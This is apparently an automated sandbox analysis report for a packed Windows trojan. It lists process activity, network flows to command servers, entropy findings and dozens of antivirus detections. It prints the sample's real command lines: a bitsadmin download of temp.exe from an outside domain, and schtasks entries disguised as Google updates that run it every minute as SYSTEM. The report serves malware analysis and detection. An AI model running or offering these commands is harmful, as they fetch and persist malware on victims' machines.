Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | June 21, 2021, 12:38 p.m. | June 21, 2021, 12:54 p.m. |
-
-
cmd.exe C:\Windows\system32\cmd.exe /C bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe"
6116-
bitsadmin.exe bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe"
3660
-
-
cmd.exe C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe
3908-
schtasks.exe schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe
2120
-
-
cmd.exe C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe
3360-
schtasks.exe schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe
4368
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
date-flash.com | 103.209.101.233 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49809 103.72.4.166:8443 |
C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1 |
TLSv1 192.168.56.102:49810 103.72.4.166:8443 |
C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1 |
TLSv1 192.168.56.102:49821 103.72.4.166:8443 |
C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1 |
TLSv1 192.168.56.102:49823 103.72.4.166:8443 |
C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1 |
TLSv1 192.168.56.102:49824 103.72.4.166:8443 |
C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1 |
TLSv1 192.168.56.102:49825 103.72.4.166:8443 |
C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1 |
TLSv1 192.168.56.102:49826 103.72.4.166:8443 |
C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1 |
TLSv1 192.168.56.102:49828 103.72.4.166:8443 |
C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1 |
TLSv1 192.168.56.102:49829 103.72.4.166:8443 |
C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1 |
TLSv1 192.168.56.102:49827 103.72.4.166:8443 |
C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1 |
TLSv1 192.168.56.102:49811 103.72.4.166:8443 |
C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1 |
TLSv1 192.168.56.102:49822 103.72.4.166:8443 |
C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | C=CN, ST=Beijing, O=BeiJing Baidu Netcom Science Technology Co., Ltd, OU=service operation department, CN=www.baidu.cn | f6:57:8e:d1:8d:a0:aa:74:59:26:a9:09:e6:81:dc:ca:56:ee:cf:b1 |
suspicious_features | Connection to IP address | suspicious_request | GET http://61.135.169.121/ | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET https://103.72.4.166:8443/images/logo_max.png | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET https://103.72.4.166:8443/images/logo.png | ||||||
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST https://103.72.4.166:8443/user/CheckLogin?ticket=C75j6UbqNtpG-jKQRdQ62w |
request | GET http://61.135.169.121/ |
request | HEAD http://date-flash.com/temp.exe |
request | GET https://103.72.4.166:8443/images/logo_max.png |
request | GET https://103.72.4.166:8443/images/logo.png |
request | POST https://103.72.4.166:8443/user/CheckLogin?ticket=C75j6UbqNtpG-jKQRdQ62w |
request | POST https://103.72.4.166:8443/user/CheckLogin?ticket=C75j6UbqNtpG-jKQRdQ62w |
cmdline | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
cmdline | C:\Windows\system32\cmd.exe /C bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe" |
cmdline | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe |
cmdline | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe |
cmdline | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
section | {u'size_of_data': u'0x00350c00', u'virtual_address': u'0x0031c000', u'entropy': 7.869545546306953, u'name': u'UPX1', u'virtual_size': u'0x00351000'} | entropy | 7.86954554631 | description | A section with a high entropy has been found | |||||||||
entropy | 0.999852746282 | description | Overall entropy of this PE file is high |
section | UPX0 | description | Section name indicates UPX | ||||||
section | UPX1 | description | Section name indicates UPX | ||||||
section | UPX2 | description | Section name indicates UPX |
cmdline | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
cmdline | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe |
cmdline | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe |
cmdline | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
host | 103.72.4.166 | |||
host | 172.217.25.14 | |||
host | 61.135.169.121 |
cmdline | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
cmdline | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe |
cmdline | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdated' /RL HIGHEST /tr c:\Windows\temp\temp.exe |
cmdline | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
process | temp.exe | useragent | |||||||
process | temp.exe | useragent | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 |
cmdline | bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe" |
cmdline | C:\Windows\system32\cmd.exe /C bitsadmin /transfer GoogleUpdated /download /priority normal "http://date-flash.com/temp.exe" "c:\Windows\temp\temp.exe" |
cmdline | C:\Windows\system32\cmd.exe /C schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
cmdline | schtasks /create /sc minute /mo 1 /tn 'GoogleUpdatab' /RU SYSTEM /tr c:\Windows\temp\temp.exe |
Elastic | malicious (high confidence) |
MicroWorld-eScan | Trojan.GenericKD.37043105 |
FireEye | Generic.mg.d89c813bf46d01f1 |
McAfee | Artemis!D89C813BF46D |
Cylance | Unsafe |
Zillya | Trojan.Rozena.Win32.124132 |
Sangfor | Riskware.Win32.Agent.ky |
K7AntiVirus | Trojan ( 0056c3071 ) |
Alibaba | Backdoor:Win64/Shelma.da3ddcc0 |
K7GW | Trojan ( 0056c3071 ) |
Cybereason | malicious.4cb10c |
Cyren | W64/Trojan.MYRZ-7542 |
Symantec | Trojan.Gen.2 |
ESET-NOD32 | a variant of Win32/Rozena.AVL |
APEX | Malicious |
Avast | Win64:Trojan-gen |
Kaspersky | Trojan.Win64.Shelma.lbo |
BitDefender | Trojan.GenericKD.37043105 |
Paloalto | generic.ml |
Tencent | Win64.Trojan.Shelma.Wstw |
Ad-Aware | Trojan.GenericKD.37043105 |
Sophos | Mal/Generic-S |
F-Secure | Trojan.TR/Rozena.sdjwo |
DrWeb | Trojan.DownLoader39.52985 |
VIPRE | Trojan.Win32.Generic!BT |
TrendMicro | TROJ_GEN.R011C0WF821 |
McAfee-GW-Edition | BehavesLike.Win64.Gravity.wc |
Emsisoft | Trojan.GenericKD.37043105 (B) |
Ikarus | Trojan.Win32.Rozena |
Jiangmin | Trojan.Shelma.ilj |
MaxSecure | Trojan.Malware.300983.susgen |
Avira | TR/Rozena.sdjwo |
Antiy-AVL | Trojan/Generic.ASBOL.C5E3 |
Gridinsoft | Suspicious.XOR_Encoded.bot!yf |
Microsoft | Trojan:Win32/Glupteba!ml |
ZoneAlarm | Trojan.Win64.Shelma.lbo |
GData | Trojan.GenericKD.37043105 |
Cynet | Malicious (score: 100) |
ALYac | Trojan.GenericKD.37043105 |
MAX | malware (ai score=88) |
VBA32 | Trojan.Win64.Shelma |
TrendMicro-HouseCall | TROJ_GEN.R011C0WF821 |
Yandex | Trojan.Shelma!1U+6LbCbUgU |
Fortinet | W64/Shelma.AVL!tr |
AVG | Win64:Trojan-gen |
Panda | Trj/CI.A |
CrowdStrike | win/malicious_confidence_80% (W) |